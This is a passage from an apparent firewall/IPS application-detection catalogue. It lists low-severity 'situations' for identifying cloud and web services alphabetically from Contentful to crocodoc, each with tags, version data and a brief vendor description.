Back to top

Contentful

About this situation: Application Contentful detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1730-5242
Description: Contentful is the flexible and future-friendly content management platform that lets you publish content across platforms.
Back to top

Continuity-Logic

About this situation: Application Continuity-Logic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Continuity Logic cloud-based platform is enterprise GRC platform that requires zero coding, helping you keep up with the velocity of change. Main services include consulting with assessments or plan creation for business continuity, resiliency, governance, risk, compliance and disaster recovery.
Back to top

Contract-Alert

About this situation: Application Contract-Alert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Contract Alert stores all your contracts and contract documents in one central repository.
Back to top

ContractExpress.com

About this situation: Application ContractExpress.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Integrity provides document assembly and contract creation with Salesforce integration for the automation and management of contracts.
Back to top

Contractpal

About this situation: ContractPal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: ContractPal provides custom cloud based, SaaS (software as a solution) applications, online digital signature and electronic signature software.
Back to top

ContractWorks

About this situation: Application ContractWorks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ContractWorks provides secure and contract management software that helps you gain control of your contracts.
Back to top

ControlNow

About this situation: Application ControlNow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ControlNow is LogicNow's cloud-based integrated remote management and security platform for IT administrators in end-user organizations, delivering operational efficiency and multi-layer security that allows them to help their businesses win through technology.
Back to top

Converge-Enterprise

About this situation: Application Converge-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Converge Enterprise is Cloud CRM company offering an collaboration network portal connecting Customers, Partners and Employees through social and mobile cloud technology.
Back to top

ConvergeHub

About this situation: Application ConvergeHub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ConvergeHub CRM is cloud based Business Growth Software for streamlining sales, marketing, customer service and collaboration.
Back to top

Convergex

About this situation: Application Convergex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Convergex is an agency-focused global brokerage and trading related services provider with one overarching mission
Back to top

Conversant

About this situation: Application Conversant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Conversant provides a personalized digital marketing, transforming the industry through cutting-edge technology, bold creative and a staggering amount of data.
Back to top

Convert-XPS-to-PDF

About this situation: Application Convert-XPS-to-PDF detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Convert XPS to PDF is an online conversion service for XPS and OXPS to PDF.
Back to top

Convertexperiments

About this situation: ConvertExperiments usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Create and edit tests just like in a text editor to create tests on the fly but with an advanced style sheet editor for dynamic pages (e.g. e-commerce product pages).
Back to top

Convertfiles

About this situation: Convertfiles usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Convert your files from one file type to another without downloading any software.
Back to top

ConvertPDFtoWord

About this situation: Application ConvertPDFtoWord detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ConvertPDFtoWord is a service that helps convert PDF to Word document online for free.
Back to top

Conviva

About this situation: Conviva usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Conviva is a venture-backed, privately held company, offering solutions for online video optimization and online video analytics. Source: Wikipedia
Back to top

Convo

About this situation: Application Convo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Convo is built for organizations to centrally share, organize, and archive information across dispersed teams.
Back to top

Cookiebot

About this situation: Cookiebot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Description: Cookiebot is cookie management and scanning software.
Back to top

Cooks-Illustrated

About this situation: Application Cooks-Illustrated detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cook's Illustrated is an American cooking magazine published by America's Test Kitchen in Brookline, Massachusetts, every two months. It accepts no advertising and is characterized by extensive recipe testing and detailed instructions.
Back to top

Coolstreaming.it

About this situation: coolstreaming.it usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

CoorpAcademy

About this situation: Application CoorpAcademy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CoorpAcademy is a cloud-based, learning management system that helps companies deliver their online training.
Back to top

Copper-Egg

About this situation: Application Copper-Egg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CopperEgg provides true real-time server monitoring to optimize performance of IT services. Using CopperEgg's real-time monitoring solutions, you see everything as it happens.
Back to top

Copyscape

About this situation: Copyscape usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Copyscape is an online plagiarism detection service that checks whether similar text content appears elsewhere on the web.
Back to top

COR360

About this situation: Application COR360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corcentric specializing in Accounts Payable automation, PO requisitioning and imaging, and workflow solutions. Corcentric allows companies to immediately manage their invoices electronically.
Back to top

Coral-CDN

About this situation: Coral CDN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-630-5211
Description: Coral CDN usage has been detected.
Back to top

CoralTree

About this situation: Application CoralTree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qbox is a folder on your PC attached to the cloud. Files kept in the Qbox folder can be shared with your accountants, clients, business partners or employees securely.
Back to top

CordiantTechnologies

About this situation: Application CordiantTechnologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CordiantTechnologies is a digital learning solutions company that provides offshore product development and internet application development services. The company is specialized in developing tablet, smartphone, and cloud-based applications for enterprises, consumers, and startups. Its product development services include product research and conceptualization, offshore development and testing, architecture design and platform identification, product maintenance and support, deployment to the cloud and social network integration.
Back to top

Core-Commissions

About this situation: Application Core-Commissions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Core provides self-service Incentive Compensation Management solutions.
Back to top

Corecon

About this situation: Application Corecon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corecon is a comprehensive web-based construction software suite for estimating, project management, job cost control, scheduling and collaboration.
Back to top

Corefino

About this situation: Application Corefino detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corefino is a software service provider for online business, SaaS accounting, finance reporting, cloud accounting and GAAP compliance.
Back to top

CoreMedia

About this situation: Application CoreMedia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CoreMedia is a company that has been powering the online strategy of organizations across industries. Its solutions help transform e-Commerce stores by infusing visually content into the online customer experience, resulting in sales.
Back to top

Coremetrics-Analytics

About this situation: Application Coremetrics-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IBM Digital Analytics is the analytics center that fuels the IBM Digital Marketing Optimization Suite.
Back to top

Corent-SurPaaS

About this situation: Application Corent-SurPaaS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Using SurPaaS to provide SaaS Enablement as a Service, Cloud providers and the Managed Service Providers (MSPs) using that cloud are able to rapidly transform software vendors into SaaS Providers.
Back to top

CorePlus

About this situation: Application CorePlus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CorePlus Universal Banking is a fully web based, multi-channel and multi-currency commercial banking system with a high performance core banking and a comprehensive range of feature-rich modules.
Back to top

CORESense

About this situation: Application CORESense detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CORESense is a provider of ecommerce and retail management software solutions for online, multichannel and brick and mortar retailers, brand manufacturers, wholesalers and distributors.
Back to top

Coreworx

About this situation: Application Coreworx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coreworx is a software and services company who provides integrated project information management solutions for the world's largest, most complex capital projects. Coreworx software solutions are proven enterprise applications that enable EPCs and owner
Back to top

Cornerstone

About this situation: Application Cornerstone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cornerstone OnDemand is a provider of cloud-based talent management software solutions. Recruiting Solutions, Training Employees with LMS, and Performance Tracking for a Connected Workforce.
Back to top

Corniche

About this situation: Application Corniche detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Designed for the management of private banks, offshore banksand other financial institutions involved in loans and payments, Corniche provides true multiple currency accounting with a uniform back-office interface, merchant and card services.
Back to top

Corporate-Perks

About this situation: Application Corporate-Perks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corporate perks and great deals and discounts from top merchants available exclusively to US corporation employees.
Back to top

Corporate-Renaissance-Group

About this situation: Application Corporate-Renaissance-Group detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corporate Renaissance Group drives better management and performance through innovative solutions, to organizations of all sizes, in all sectors.
Back to top

Corporation-Service-Company

About this situation: Application Corporation-Service-Company detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corporation Service Company
Back to top

Corptax

About this situation: Application Corptax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corptax is the provider of business process and automation solutions for corporate tax. Its SaaS applications set financial technology by supporting the lifecycle - provision, compliance and planning for the companies.
Back to top

CorpTrav

About this situation: Application CorpTrav detected
Context: Application Context
Severity: 1
Tags: Web Applications, Travel and Expense
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CorpTrav provides solution to business travel related challenges. It helps to create a customized travel program that fits needs .
Back to top

Cortana

About this situation: Endpoint Context Agent based Cortana detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Cortana endpoint application was detected. Cortana is an intelligent personal assistant created by Microsoft.
Back to top

Cortera

About this situation: Application Cortera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cortera provides business information with a database containing a number of private and public U.S. companies, analytics about each of those companies, and workflow software.
Back to top

Cosential

About this situation: Application Cosential detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cosential delivers comprehensive CRM and proposal automation that works the way Architecture, Engineering, and Construction firms need it to work.
Back to top

CoSign

About this situation: Application CoSign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cosign is a supplier of architectural signage solutions.
Back to top

Cosium

About this situation: Cosium traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1161-5242
Description: Cosium develops cloud-based software solutions and devices for the healthcare industry.
Back to top

CosmoLex

About this situation: Application CosmoLex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CosmoLex can eliminate the need to maintain multiple programs because CosmoLex does time and expense tracking, billing, business accounting, trust
Back to top

Cost-Plus-World-Market

About this situation: Application Cost-Plus-World-Market detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cost Plus World Market is a chain of import retail stores, selling home furniture, decor, curtains, rugs, gifts, apparel, coffee, wine, craft beer.
Back to top

Costco-Photo-Center

About this situation: Costco Photo Center usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Costco Photo Center allows user to upload photos, order prints and create photo gifts.
Back to top

Cotap

About this situation: Cotap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-673-5211
Description: Cotap is a secure texting service intented for business usage. The service can be used via a desktop or mobile application or from browser.
Back to top

CoTweet-Enterprise

About this situation: Application CoTweet-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CoTweet Enterprise power customer journeys across every touchpoint - email, mobile, social, web, and beyond - helping marketers put customers at the center of everything they do.
Back to top

Coub

About this situation: Application Coub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coub is a video sharing website and both iOS and Android app. It allows users to create and share looping videos up to ten seconds long, using existing video from YouTube, Vimeo, or their own files.
Back to top

Couchsurfing

About this situation: Application Couchsurfing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Couchsurfing is a global community for share life, people world, their journey.
Back to top

Cougarmtn

About this situation: Application Cougarmtn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cougar Mountain Software provides business accounting software and hardware solutions for retail, wholesale, nonprofit and service based businesses throughout the world. Cougar Mountain Software employs accounting and business experts for their product development, sales, support, and training staff, many with accounting degrees.
Back to top

CounterPath

About this situation: Application CounterPath detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CounterPath provides desktop and mobile SIP-based VoIP softphones and solutions for enterprises and operators.
Back to top

Coupa

About this situation: Application Coupa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coupa'c cloud-based suite of financial applications helps you spend smarter and more efficiently.
Back to top

Courion

About this situation: Application Courion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Courion Corporation is a provider of Identity and Access Management
Back to top

Coursera

About this situation: Coursera usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-595-5211
Description: Coursera usage detected
Back to top

CourseSmart

About this situation: Application CourseSmart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CourseSmart is a provider of eTextbooks and digital course materials.
Back to top

Covad

About this situation: Application Covad detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Covad is a provider of broadband voice and data communications.
Back to top

Covendis

About this situation: Application Covendis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Covendis develops services procurement software solutions for companies and government entities.
Back to top

CoveritLive

About this situation: Application CoveritLive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CoveritLive- is a social media platform that lets brands, media companies, individuals and small organizations share real, virtual and hybrid events online.
Back to top

Covisint-Corporation

About this situation: Application Covisint-Corporation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Covisint provides a single entry point for all your business partners, customers and employees to connect with your enterprise, that ensures trusted information goes to the right people and place at the right time.
Back to top

Coworkers.com

About this situation: Application Coworkers.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coworkers.com offers tools to create a personal dashboard to manage, analyze and gain feedback on overall performance of its users.
Back to top

Cox-Webmail

About this situation: Cox WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: Web based mail provided by Cox.
Back to top

Coxito

About this situation: Application Coxito detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coxito is an information discovery and analysis application, delivering information discovery functionality for cloud data.
Back to top

Cozimo

About this situation: Application Cozimo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cozimo is a real time collaboration tool where you can review your design, video and pdf projects
Back to top

cPanel

About this situation: Application cPanel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: cPanel is a Linux based web hosting control panel that provides a graphical interface and automation tools designed to simplify the process of hosting a web site.
Back to top

CPXinteractive-Advertisements-Service

About this situation: CPX Interactive Advertisements service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: CPX Interactive provides an on-line advertising service.
Back to top

Crackle

About this situation: Crackle usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site provides streaming video in Flash video format. Source: Wikipedia
Back to top

CradlePoint

About this situation: Application CradlePoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cradlepoint is a provider of software-defined, cloud-managed 4G LTE networking solutions, providing secure, business-grade connectivity to distributed enterprises.
Back to top

Craigslist

About this situation: Craigslist usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-628-5211
Description: Craigslist is a classified advertisements website with sections devoted to jobs, housing, personals, for sale, items wanted, services, community, gigs, resumes, and discussion forums.
Back to top

Crashlytics

About this situation: Crashlytics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1764-5242
Description: Crashlytics is a software crash report and analytics framework.
Back to top

CrashPlan

About this situation: Endpoint Context Agent based CrashPlan detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: CrashPlan endpoint application has been detected. CrashPlan is a cloud backup service operated by Code42 Software, Inc.
Back to top

CrashPlan

About this situation: CrashPlan usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1075-5242
Description: CrashPlan is a backup software that allows users to back up and store personal, business and enterprise data.
Back to top

Crate

About this situation: Application Crate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crate makes file-sharing easy, with a slick interface and the ability to drag-and-drop files from desktop to browser. Drag-and-drop all of the files you want to your content and they'll be stored on the cloud. Additional features include letting others add files to any crate that you are filling up, and also to use a built-in URL shortener for sharing the location of your crate and the files that it contains even faster.
Back to top

Crates.io

About this situation: Crates.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Description: Crates.io hosts software components for the Rust language.
Back to top

Crazy-Domains

About this situation: Application Crazy-Domains detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crazy Domains is a domain names provider offering the prices on domain registration with approvals.
Back to top

Crazy-Egg

About this situation: Crazy Egg usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to track and understand how visitors interact with their company website.
Back to top

CrazyCall

About this situation: Application CrazyCall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CrazyCall is a call center platform that guarantees sales and productivity through a web-based application. It provides support and control for call center managers and agents.
Back to top

Crealogix

About this situation: Application Crealogix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The CREALOGIX Group is a Swiss software house and the market for Digital Banking in Switzerland. CREALOGIX develops and implements fintech solutions for the digital bank of tomorrow. The focus is placed on changed customer needs for mobility, security, personalised advice and education within a comprehensive user experience.
Back to top

Create-A-Forum

About this situation: Create a Forum usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-750-5211
Description: a web-forum hosting site
Back to top

Creately

About this situation: Creately usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Creately is diagramming and design software operated by Cinergix, Pty Ltd. It is a cloud-based diagram tool built on Adobe Flex Flash technologies and provides a visual communication platform for virtual teams.
Back to top

Credit-Karma

About this situation: Application Credit-Karma detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Credit Karma is a web-based credit and financial management service for consumers.
Back to top

CreditSafe

About this situation: Application CreditSafe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Creditsafe Group is a privately owned multinational provider of on-line company credit information
Back to top

Crelate-Talent

About this situation: Application Crelate-Talent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crelate Talent is relationship management, paired with applicant tracking, and delivered with white glove service.
Back to top

CRG-emPerform

About this situation: Application CRG-emPerform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CRG emPerform offers online employee performance management software for automating talent management and driving business results.
Back to top

CrispThinking

About this situation: Application CrispThinking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crisp Thinking offers online community management software that enables users to moderate and manage user-generated content.
Back to top

Criteo

About this situation: Criteo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1764-5242
Description: Criteo usage detected. Criteo is an advertising and product recommendation engine.
Back to top

Criteria-Corp

About this situation: Application Criteria-Corp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Criteria Corp is a leading provider of professionally developed pre-employment tests, including aptitude, personality, and skills tests.
Back to top

Criterion Channel

About this situation: Criterion Channel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1658-5242
Description: The Criterion Channel is an online streaming service that the company The Criterion Collection operates. This application situation is meant only for blocking the application.
Back to top

CritSend

About this situation: Application CritSend detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CritSend allow reliably deliver emails to their appropriate inboxes and preemptively filter spam.
Back to top

Crittercism

About this situation: Crittercism usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Crittercism is a mobile application usage and error monitoring service.
Back to top

CRMboost

About this situation: Application CRMboost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CRM BOOST - Web based CRM software solution with integrated Email Marketing and Social CRM components.
Back to top

CRMdesk

About this situation: Application CRMdesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CRMdesk is web-based help desk software for knowledgebase management and customer support automation over the Internet.CRMdesk allows supporting an unlimited number of customers and may be seamlessly integrated with a company's web site.
Back to top

CRMnext

About this situation: Application CRMnext detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CRMnext is Commutable Cloud Customer Relationship Management solution company. It is available on both, public cloud, and private cloud. It has to its credits the largest single platform banking CRM implementation.
Back to top

crocodoc

About this situation: Application crocodoc detected
Context: Application Context
Severity: 1
